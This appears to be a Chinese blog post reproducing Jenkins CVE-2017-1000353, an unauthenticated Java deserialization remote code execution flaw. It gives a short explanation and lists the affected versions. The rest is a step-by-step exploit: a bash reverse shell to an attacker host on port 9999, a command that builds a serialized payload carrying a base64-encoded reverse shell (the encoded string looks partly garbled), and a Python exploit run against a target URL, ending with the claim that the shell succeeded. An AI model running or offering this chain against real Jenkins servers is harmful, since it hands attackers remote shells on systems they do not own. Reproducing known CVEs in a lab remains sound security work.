【jenkins】CVE-2017-1000353

0x01漏洞原理

enkins 未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行。

 

0x02影响版本

 所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
 
 
0x03漏洞复现
工具:
https://github.com/vulhub/CVE-2017-1000353
 
反弹shell
https://forum.ywhack.com/reverse-shell/
/bin/bash -i >& /dev/tcp/1.xxxx/9999 0>&1

编码

https://r0yanx.com/tools/java_exec_encode

 

 生成二进制文件jenkins_poc.ser

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIdddddddddC9kZXYvdGNwLzEuMTE3LjE1OS4xOTAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

 

利用payload

python2 exploit.py http://1.xxxxx:8080/ jenkins_poc.ser

 反弹shell成功

 

posted @   任尔东西南北风  阅读(569)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示